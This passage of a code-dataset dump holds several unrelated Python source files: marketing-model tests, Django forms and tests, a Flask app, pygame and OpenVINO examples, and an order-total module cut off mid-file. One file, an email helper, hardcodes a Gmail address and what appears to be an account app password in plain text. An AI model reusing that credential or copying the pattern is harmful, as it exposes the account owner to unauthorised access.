pd.date_range(\n start=\"2019-06-01\", end=\"2021-12-31\", freq=\"W-MON\"\n )\n\n n: int = date_data.size\n\n return pd.DataFrame(\n data={\n \"date\": date_data,\n \"y\": rng.integers(low=0, high=100, size=n),\n \"channel_1\": rng.integers(low=0, high=400, size=n),\n \"channel_2\": rng.integers(low=0, high=50, size=n),\n \"control_1\": rng.gamma(shape=1000, scale=500, size=n),\n \"control_2\": rng.gamma(shape=100, scale=5, size=n),\n \"other_column_1\": rng.integers(low=0, high=100, size=n),\n \"other_column_2\": rng.normal(loc=0, scale=1, size=n),\n }\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef mmm(toy_df: pd.DataFrame) -> DelayedSaturatedMMM:\n return DelayedSaturatedMMM(\n data=toy_df,\n target_column=\"y\",\n date_column=\"date\",\n channel_columns=[\"channel_1\", \"channel_2\"],\n control_columns=[\"control_1\", \"control_2\"],\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef mmm_fitted(mmm: DelayedSaturatedMMM) -> DelayedSaturatedMMM:\n mmm.fit(target_accept=0.8, draws=3, chains=2)\n return mmm\n\n\nclass TestMMM:\n @pytest.mark.parametrize(\n argnames=\"adstock_max_lag\",\n argvalues=[1, 4],\n ids=[\"adstock_max_lag=1\", \"adstock_max_lag=4\"],\n )\n @pytest.mark.parametrize(\n argnames=\"control_columns\",\n argvalues=[None, [\"control_1\"], [\"control_1\", \"control_2\"]],\n ids=[\"no_control\", \"one_control\", \"two_controls\"],\n )\n @pytest.mark.parametrize(\n argnames=\"channel_columns\",\n argvalues=[\n ([\"channel_1\"]),\n ([\"channel_1\", \"channel_2\"]),\n ],\n ids=[\n \"single_channel\",\n \"multiple_channel\",\n ],\n )\n @pytest.mark.parametrize(\n argnames=\"yearly_seasonality\",\n argvalues=[None, 2],\n ids=[\"no_yearly_seasonality\", \"yearly_seasonality\"],\n )\n def test_init(\n self,\n toy_df: pd.DataFrame,\n yearly_seasonality: Optional[int],\n channel_columns: List[str],\n control_columns: List[str],\n adstock_max_lag: int,\n ) -> None:\n mmm = DelayedSaturatedMMM(\n data=toy_df,\n target_column=\"y\",\n date_column=\"date\",\n channel_columns=channel_columns,\n control_columns=control_columns,\n adstock_max_lag=adstock_max_lag,\n yearly_seasonality=yearly_seasonality,\n )\n\n n_channel: int = len(mmm.channel_columns)\n samples: int = 3\n\n with mmm.model:\n prior_predictive: az.InferenceData = pm.sample_prior_predictive(\n samples=samples, random_seed=rng\n )\n\n assert (\n az.extract(\n prior_predictive, group=\"prior\", var_names=[\"intercept\"], combined=True\n )\n .to_numpy()\n .size\n == samples\n )\n assert az.extract(\n data=prior_predictive,\n group=\"prior\",\n var_names=[\"beta_channel\"],\n combined=True,\n ).to_numpy().shape == (\n n_channel,\n samples,\n )\n assert az.extract(\n data=prior_predictive, group=\"prior\", var_names=[\"alpha\"], combined=True\n ).to_numpy().shape == (\n n_channel,\n samples,\n )\n assert az.extract(\n data=prior_predictive, group=\"prior\", var_names=[\"lam\"], combined=True\n ).to_numpy().shape == (\n n_channel,\n samples,\n )\n\n if control_columns is not None:\n n_control = len(control_columns)\n assert az.extract(\n data=prior_predictive,\n group=\"prior\",\n var_names=[\"gamma_control\"],\n combined=True,\n ).to_numpy().shape == (\n n_control,\n samples,\n )\n if yearly_seasonality is not None:\n assert az.extract(\n data=prior_predictive,\n group=\"prior\",\n var_names=[\"gamma_fourier\"],\n combined=True,\n ).to_numpy().shape == (\n 2 * yearly_seasonality,\n samples,\n )\n\n def test_fit(self, toy_df: pd.DataFrame) -> None:\n draws: int = 100\n chains: int = 2\n\n mmm = DelayedSaturatedMMM(\n data=toy_df,\n 
target_column=\"y\",\n date_column=\"date\",\n channel_columns=[\"channel_1\", \"channel_2\"],\n control_columns=[\"control_1\", \"control_2\"],\n adstock_max_lag=2,\n yearly_seasonality=2,\n )\n n_channel: int = len(mmm.channel_columns)\n n_control: int = len(mmm.control_columns)\n fourier_terms: int = 2 * mmm.yearly_seasonality\n\n mmm.fit(target_accept=0.81, draws=draws, chains=chains, random_seed=rng)\n idata: az.InferenceData = mmm.fit_result\n assert (\n az.extract(data=idata, var_names=[\"intercept\"], combined=True)\n .to_numpy()\n .size\n == draws * chains\n )\n assert az.extract(\n data=idata, var_names=[\"beta_channel\"], combined=True\n ).to_numpy().shape == (n_channel, draws * chains)\n assert az.extract(\n data=idata, var_names=[\"alpha\"], combined=True\n ).to_numpy().shape == (n_channel, draws * chains)\n assert az.extract(\n data=idata, var_names=[\"lam\"], combined=True\n ).to_numpy().shape == (n_channel, draws * chains)\n assert az.extract(\n data=idata, var_names=[\"gamma_control\"], combined=True\n ).to_numpy().shape == (\n n_channel,\n draws * chains,\n )\n\n mean_model_contributions_ts = mmm.compute_mean_contributions_over_time(\n original_scale=True\n )\n assert mean_model_contributions_ts.shape == (\n toy_df.shape[0],\n n_channel + n_control + fourier_terms + 1,\n )\n assert mean_model_contributions_ts.columns.tolist() == [\n \"channel_1\",\n \"channel_2\",\n \"control_1\",\n \"control_2\",\n \"sin_order_1\",\n \"cos_order_1\",\n \"sin_order_2\",\n \"cos_order_2\",\n \"intercept\",\n ]\n\n @pytest.mark.parametrize(\n argnames=\"yearly_seasonality\",\n argvalues=[None, 1, 2],\n ids=[\"no_yearly_seasonality\", \"yearly_seasonality=1\", \"yearly_seasonality=2\"],\n )\n def test_get_fourier_models_data(\n self, toy_df: pd.DataFrame, yearly_seasonality: Optional[int]\n ) -> None:\n mmm = DelayedSaturatedMMM(\n data=toy_df,\n target_column=\"y\",\n date_column=\"date\",\n channel_columns=[\"channel_1\", \"channel_2\"],\n control_columns=[\"control_1\", \"control_2\"],\n adstock_max_lag=2,\n yearly_seasonality=yearly_seasonality,\n )\n\n if yearly_seasonality is None:\n with pytest.raises(ValueError):\n mmm._get_fourier_models_data()\n\n else:\n fourier_modes_data: Optional[pd.DataFrame] = mmm._get_fourier_models_data()\n assert fourier_modes_data.shape == (\n toy_df.shape[0],\n 2 * yearly_seasonality,\n )\n assert fourier_modes_data.max().max() <= 1\n assert fourier_modes_data.min().min() >= -1\n", "repo_name": "Mahrukhw/pymc-marketing", "sub_path": "tests/mmm/test_delayed_saturated_mmm.py", "file_name": "test_delayed_saturated_mmm.py", "file_ext": "py", "file_size_in_byte": 7855, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "46", "api": [{"api_name": "numpy.random", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.default_rng", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.date_range", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 37, 
"usage_type": "call"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 38, "usage_type": "name"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 49, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 86, "usage_type": "name"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 89, "usage_type": "call"}, {"api_name": "arviz.InferenceData", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pymc.sample_prior_predictive", "line_number": 103, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 108, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 115, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 124, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 130, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 139, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 149, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 65, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 76, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 163, "usage_type": "call"}, {"api_name": "arviz.InferenceData", "line_number": 177, "usage_type": "attribute"}, {"api_name": "arviz.extract", "line_number": 179, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 184, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 187, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 190, "usage_type": "call"}, {"api_name": "arviz.extract", "line_number": 193, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 225, "usage_type": "name"}, {"api_name": "pymc_marketing.mmm.delayed_saturated_mmm.DelayedSaturatedMMM", "line_number": 227, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 238, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 242, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 219, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 219, "usage_type": "attribute"}]} +{"seq_id": "72254866682", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom core.models import Passenger, Taxi\n\n\n\nclass BasicUserForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ('first_name', 
'last_name')\n\n\nclass BasicCustomerForm(forms.ModelForm):\n class Meta:\n model = Passenger\n fields = ('profile_photo', 'phone_number')\n\n\nclass TaxiBookingForm(forms.ModelForm):\n pickup_address = forms.CharField(\n max_length=255,\n required=True,\n label='',\n widget=forms.TextInput(attrs={\n 'placeholder': 'Where are you?',\n 'class': 'form-control'\n })\n )\n dropoff_address = forms.CharField(\n max_length=255,\n required=True,\n label='',\n widget=forms.TextInput(attrs={\n 'placeholder': 'Where do you want to go?',\n 'class': 'form-control'\n })\n )\n taxi_size = forms.ChoiceField(\n choices=Taxi.TAXI_SIZE,\n widget=forms.Select(attrs={'class': 'form-control'})\n )\n description = forms.CharField(\n label='',\n widget=forms.Textarea(attrs={'rows': 2, 'cols': 20, 'placeholder': 'Write description or a message for the driver', 'class': 'form-control'}),\n required=False\n )\n pickup_datetime = forms.DateTimeField(\n label='Pickup Date and Time',\n widget=forms.DateTimeInput(attrs={'type': 'datetime-local', 'class': 'form-control'}),\n input_formats=['%d-%m-%YT%H:%M'],\n )\n\n class Meta:\n model = Taxi\n fields = ['pickup_address', 'dropoff_address', 'taxi_size', 'description', 'pickup_datetime']\n", "repo_name": "shahbakhat/Taksy", "sub_path": "core/passenger/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 13, "usage_type": "name"}, {"api_name": "core.models.Passenger", "line_number": 15, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 24, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 24, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 33, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 33, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 38, "usage_type": "name"}, {"api_name": "core.models.Taxi.TAXI_SIZE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "core.models.Taxi", "line_number": 39, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 40, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 40, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 42, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 44, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 44, "usage_type": "name"}, {"api_name": "django.forms.DateTimeField", 
"line_number": 47, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 47, "usage_type": "name"}, {"api_name": "django.forms.DateTimeInput", "line_number": 49, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 49, "usage_type": "name"}, {"api_name": "core.models.Taxi", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "71337467659", "text": "import pygame\nfrom pygtails import Game, Circle\nfrom colors import *\n\nclass CirclePoke(Game):\n def __init__(self):\n super().__init__((400, 300), \"Circle Fun\")\n self.screen.fill(WHITE)\n pygame.display.flip()\n c = PokeyCircle(self)\n c.draw()\n\nclass PokeyCircle(Circle):\n def __init__(self, game):\n super().__init__(game, (20, 20), 50)\n self.color = BLUE\n\n def draw(self):\n pygame.draw.circle(self.game.screen, self.color,\n self.center, self.radius)\n pygame.display.flip()\n\n def on_mouse_down(self, event):\n if self.color == BLUE:\n self.color = GREEN\n else:\n self.color = BLUE\n self.draw()\n\ngame = CirclePoke()\ngame.main()\n", "repo_name": "josiest/pygtails", "sub_path": "examples/circle_fun.py", "file_name": "circle_fun.py", "file_ext": "py", "file_size_in_byte": 764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "pygtails.Game", "line_number": 5, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygtails.Circle", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.draw.circle", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "39138532466", "text": "import sys\nfrom collections import defaultdict, deque\n\nn = int(sys.stdin.readline())\ndicts = defaultdict(list)\nvisited = [0] * (n + 1)\nq = deque()\nq.append(1)\n\nfor _ in range(n - 1):\n node_a, node_b = map(int, sys.stdin.readline().split())\n dicts[node_a].append(node_b)\n dicts[node_b].append(node_a)\n\nwhile q:\n idx = q.popleft()\n for i in dicts[idx]:\n if not visited[i]:\n visited[i] = idx\n q.append(i)\n\nprint(*visited[2:], sep=\"\\n\")", "repo_name": "Real-Man-Club/Baekjoon", "sub_path": "devappmin/11725.트리의 부모 찾기.py", "file_name": "11725.트리의 부모 찾기.py", "file_ext": "py", "file_size_in_byte": 476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.stdin.readline", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 4, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 5, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.stdin.readline", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 11, "usage_type": "attribute"}]} +{"seq_id": "72272987642", "text": "# cmd .\\.venvs\\lpthw\\Scripts\\activate 转到虚拟空间\n# cmd cd 到存放文件目录\n# python app.py\n# html 居然没注释成功!!\nfrom flask import Flask\nfrom flask import render_template\n# 这个函数知道如何去template/目录加载模板.html文件,这是flask的默认设置\n# render 渲染\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n greeting = \"Hello World!\"\n # 向模板(template)提供参数 html中出项greeting的位置都是传递给模板的变量\n return 
render_template(\"index.html\",greeting = greeting)\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "Jcduhdt/python", "sub_path": "lpthw/ex50/gothonweb/bin/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 595, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "35573080134", "text": "from django.test import TestCase\n\nfrom ...common import Encoding\n\n\nclass EncodingTest(TestCase):\n def test_get_available_encodings_returns_a_list_of_encoding_elements(self):\n encodings = Encoding.get_available_encodings()\n\n self.assertTrue(isinstance(encodings, list))\n\n for each in encodings:\n self.assertTrue(isinstance(each, Encoding))\n\n def test_each_available_encoding_has_a_corresponding_serialization_object(self):\n encodings = Encoding.get_available_encodings()\n for each in encodings:\n try:\n each.get_serialization_object()\n except ValueError:\n self.fail(\n 'Encoding %s does not have a corresponding serialization \\\nobject.'\n )\n finally:\n pass\n", "repo_name": "WeZZard/django-pki", "sub_path": "django_pki_manager/tests/common/encoding.py", "file_name": "encoding.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.test.TestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "common.Encoding.get_available_encodings", "line_number": 8, "usage_type": "call"}, {"api_name": "common.Encoding", "line_number": 8, "usage_type": "name"}, {"api_name": "common.Encoding", "line_number": 13, "usage_type": "argument"}, {"api_name": "common.Encoding.get_available_encodings", "line_number": 16, "usage_type": "call"}, {"api_name": "common.Encoding", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "40761823721", "text": "from redmail import gmail\nfrom datetime import datetime\nimport pytz\nimport socket\n\ngmail.username = \"bst.einbruchschutz@gmail.com\"\ngmail.password = \"ssnnpngxsrnjdsvi\"\n\n\ndef sendGmail_svenVersion(*args, subject):\n gmail.send(\n subject=f\"[Event-Server] {get_host_name()} von eAccess-Webclient\",\n receivers=[\"ramzi.d@outlook.com\"],\n html=f\"\"\"\n
<h2>Guten Tag</h2>\n            <p></p>\n            <p>Ein Server ist nicht mehr erreichbar! Nachfolgend die Informationen vom Server:</p>\n            <p>PC-Name: {get_host_name()}</p>\n            <p>PC-Adresse: {get_local_ip()}</p>\n            <p>Der Server ist hat keine Verbindung seit:</p>\n            <p>Datum: {datum()}</p>\n            <p>Zeit: {time()}</p>\n            <p>Bitte Verbindung kontrollieren und wiederherstellen.</p>\n            <h2>BST Einbruchschutz</h2>\n        \"\"\",\n    )\n\n\ndef sendGmail_ramziVersion(*args, subject, text_1=\"\", text_2=\"\"):\n    gmail.send(\n        subject=subject,\n        receivers=[\"ramzi.d@outlook.com\"],\n        html=f\"\"\"\n            
<h2>Guten Tag</h2>\n            <p>{args}</p>\n            <p>{text_1}</p>\n            <p></p>\n            <p>{text_2}</p>\n            <p></p>\n            <p>Datum: {datum()}</p>\n            <p>Zeit: {time()}</p>\n            <p></p>\n            <h2>BST Einbruchschutz</h2>
\n \"\"\",\n )\n\n\ndef datum():\n current_date = datetime.now()\n swiss_date_format = current_date.strftime(\"%d.%m.%Y\")\n return swiss_date_format\n\n\ndef time():\n zurich_tz = pytz.timezone(\"Europe/Zurich\")\n\n # Get the current time with the Zurich timezone\n current_time = datetime.now(zurich_tz)\n\n # Format the time in Swiss format\n swiss_time_format = current_time.strftime(\"%H:%M:%S\")\n\n # Print the time in Swiss format with Zurich timezone\n return swiss_time_format\n\n\ndef get_local_ip():\n try:\n # Get the hostname of the machine\n hostname = socket.gethostname()\n\n # Get the IP address associated with the hostname\n local_ip = socket.gethostbyname(hostname)\n\n return local_ip\n except socket.gaierror as e:\n return f\"there is Error: {e} please control ur script\"\n\n\ndef get_host_name():\n try:\n # Get the hostname of the machine\n hostname = socket.gethostname()\n return hostname\n except Exception as e:\n print(f\"Error occurred: {e}\")\n return f\"there is Error: {e} please control ur script\"\n", "repo_name": "Ramzi-dr/canneraldBackupServer", "sub_path": "doorsProject/emailManager.py", "file_name": "emailManager.py", "file_ext": "py", "file_size_in_byte": 2501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "redmail.gmail.username", "line_number": 6, "usage_type": "attribute"}, {"api_name": "redmail.gmail", "line_number": 6, "usage_type": "name"}, {"api_name": "redmail.gmail.password", "line_number": 7, "usage_type": "attribute"}, {"api_name": "redmail.gmail", "line_number": 7, "usage_type": "name"}, {"api_name": "redmail.gmail.send", "line_number": 11, "usage_type": "call"}, {"api_name": "redmail.gmail", "line_number": 11, "usage_type": "name"}, {"api_name": "redmail.gmail.send", "line_number": 30, "usage_type": "call"}, {"api_name": "redmail.gmail", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": "socket.gethostname", "line_number": 70, "usage_type": "call"}, {"api_name": "socket.gethostbyname", "line_number": 73, "usage_type": "call"}, {"api_name": "socket.gaierror", "line_number": 76, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "72428955962", "text": "import cv2\nimport numpy as np\n\nfrom types import SimpleNamespace as namespace\n\nfrom .ie_tools import IEModel\nfrom .segm_postprocess import postprocess\n\n\nclass MaskRCNN(IEModel):\n def __init__(self, core, model_path, labels_file, conf=.6, device='CPU'):\n super().__init__(core, model_path, labels_file, conf, device)\n\n self.input_keys = {'image'}\n self.output_keys = {'boxes', 'labels', 'masks'}\n self.input_keys_segmentoly = {'im_info', 'im_data'}\n self.output_keys_segmentoly = {'boxes', 'scores', 'classes', 'raw_masks'}\n\n self.segmentoly_type = self.check_segmentoly_type()\n self.input_tensor_name = 'im_data' if self.segmentoly_type else 'image'\n self.n, self.c, self.h, self.w = self.model.input(self.input_tensor_name).shape\n\n def check_segmentoly_type(self):\n for input_tensor_name in self.input_keys_segmentoly:\n try:\n 
self.model.input(input_tensor_name)\n except RuntimeError:\n return False\n for output_tensor_name in self.output_keys_segmentoly:\n try:\n self.model.output(output_tensor_name)\n except RuntimeError:\n return False\n return True\n\n def get_allowed_inputs_len(self):\n return (1, 2)\n\n def get_allowed_outputs_len(self):\n return (3, 4, 5)\n\n def _preprocess(self, frame):\n image_height, image_width = frame.shape[:2]\n scale = min(self.h / image_height, self.w / image_width)\n processed_image = cv2.resize(frame, None, fx=scale, fy=scale)\n processed_image = processed_image.astype('float32').transpose(2, 0, 1)\n height, width = processed_image.shape[1], processed_image.shape[2]\n im_info = np.array([height, width, 1.0], dtype='float32') if self.segmentoly_type else None\n meta=namespace(\n original_size=frame.shape[:2],\n processed_size=processed_image.shape[1:3],\n )\n return processed_image, im_info, meta\n\n def forward(self, im_data, im_info):\n if (self.h - im_data.shape[1] < 0) or (self.w - im_data.shape[2] < 0):\n raise ValueError('Input image should have the resolution of {}x{} or less, '\n 'got {}x{}.'.format(self.w, self.h, im_data.shape[2], im_data.shape[1]))\n im_data = np.pad(im_data, ((0, 0),\n (0, self.h - im_data.shape[1]),\n (0, self.w - im_data.shape[2])),\n mode='constant', constant_values=0).reshape(1, self.c, self.h, self.w)\n feed_dict = {self.input_tensor_name: im_data}\n if im_info is not None:\n im_info = im_info.reshape(1, *im_info.shape)\n feed_dict['im_info'] = im_info\n self.infer_request.infer(feed_dict)\n if self.segmentoly_type:\n output = {name: self.infer_request.get_tensor(name).data[:] for name in self.output_keys_segmentoly}\n valid_detections_mask = output['classes'] > 0\n classes = output['classes'][valid_detections_mask]\n boxes = output['boxes'][valid_detections_mask]\n scores = output['scores'][valid_detections_mask]\n masks = output['raw_masks'][valid_detections_mask]\n else:\n output = {name: self.infer_request.get_tensor(name).data[:] for name in self.output_keys}\n valid_detections_mask = np.sum(output['boxes'], axis=1) > 0\n classes = output['labels'][valid_detections_mask] + 1\n boxes = output['boxes'][valid_detections_mask][:, :4]\n scores = output['boxes'][valid_detections_mask][:, 4]\n masks = output['masks'][valid_detections_mask]\n return boxes, classes, scores, np.full(len(classes), 0, dtype=np.int32), masks\n\n def get_detections(self, frames, return_cropped_masks=False):\n outputs = []\n for frame in frames:\n im_data, im_info, meta = self._preprocess(frame)\n\n boxes, classes, scores, _, masks = self.forward(im_data, im_info)\n scores, classes, boxes, masks = postprocess(scores, classes, boxes, masks,\n im_h=meta.original_size[0],\n im_w=meta.original_size[1],\n im_scale_y=meta.processed_size[0] / meta.original_size[0],\n im_scale_x=meta.processed_size[1] / meta.original_size[1],\n full_image_masks=True, encode_masks=False,\n confidence_threshold=self.confidence,\n segmentoly_postprocess=self.segmentoly_type)\n frame_output = []\n for i in range(len(scores)):\n if classes[i] in self.labels_to_hide:\n bbox = [int(value) for value in boxes[i]]\n if return_cropped_masks:\n left, top, right, bottom = bbox\n mask = masks[i][top:bottom, left:right]\n else:\n mask = masks[i]\n frame_output.append([bbox, scores[i], mask])\n outputs.append(frame_output)\n return outputs\n\n\nclass SemanticSegmentation(IEModel):\n @staticmethod\n def set_classes_to_hide():\n return ('person', 'rider', )\n\n def get_detections(self, frames, 
only_class_person=True):\n outputs = []\n for frame in frames:\n out_h, out_w = frame.shape[:-1]\n res = self.forward(frame)\n output = []\n for data in res:\n data = data.transpose((1, 2, 0)).astype('uint8')\n data = cv2.resize(data, (out_w, out_h))\n data = np.isin(data, self.labels_to_hide).astype('uint8')\n output.append([[0, 0, out_w - 1, out_h - 1], 1., data.astype('uint8')])\n outputs.append(output)\n return outputs\n", "repo_name": "openvinotoolkit/open_model_zoo", "sub_path": "demos/whiteboard_inpainting_demo/python/utils/network_wrappers.py", "file_name": "network_wrappers.py", "file_ext": "py", "file_size_in_byte": 6111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3804, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ie_tools.IEModel", "line_number": 10, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "types.SimpleNamespace", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "segm_postprocess.postprocess", "line_number": 90, "usage_type": "call"}, {"api_name": "ie_tools.IEModel", "line_number": 112, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "754314620", "text": "import requests\n\n# --------------------------------------------------------------------------------\n# Function: calculate_total\n# --------------------------------------------------------------------------------\n\ndef calculate_total(subtotal, shipping, discount, tax_percent):\n if subtotal < 0:\n raise ValueError('subtotal cannot be negative')\n if shipping < 0:\n raise ValueError('shipping cannot be negative')\n if discount < 0:\n raise ValueError('discount cannot be negative')\n if tax_percent < 0:\n raise ValueError('tax_percent cannot be negative')\n\n amount = subtotal + shipping - discount\n if amount < 0:\n total = 0\n else:\n total = amount * (1 + tax_percent)\n\n rounded = round(total, 2)\n return rounded\n\n\n# --------------------------------------------------------------------------------\n# Class: Item\n# --------------------------------------------------------------------------------\n\nclass Item:\n def __init__(self, name, unit_price, quantity=1):\n self.name = name\n self.unit_price = unit_price\n self.quantity = quantity\n\n def calculate_item_total(self):\n total = self.quantity * self.unit_price\n rounded = round(total, 2)\n return rounded\n\n\n# --------------------------------------------------------------------------------\n# Class: Order\n# --------------------------------------------------------------------------------\n\nclass Order:\n def __init__(self, shipping=0, discount=0, tax_percent=0):\n self.items = []\n self.shipping = shipping\n self.discount = discount\n self.tax_percent = tax_percent\n\n def add_item(self, item):\n self.items.append(item)\n\n def calculate_subtotal(self):\n subtotal = 0\n for item in self.items:\n subtotal += item.calculate_item_total()\n return subtotal\n\n def calculate_order_total(self):\n subtotal = self.calculate_subtotal()\n total = calculate_total(\n subtotal, self.shipping, 
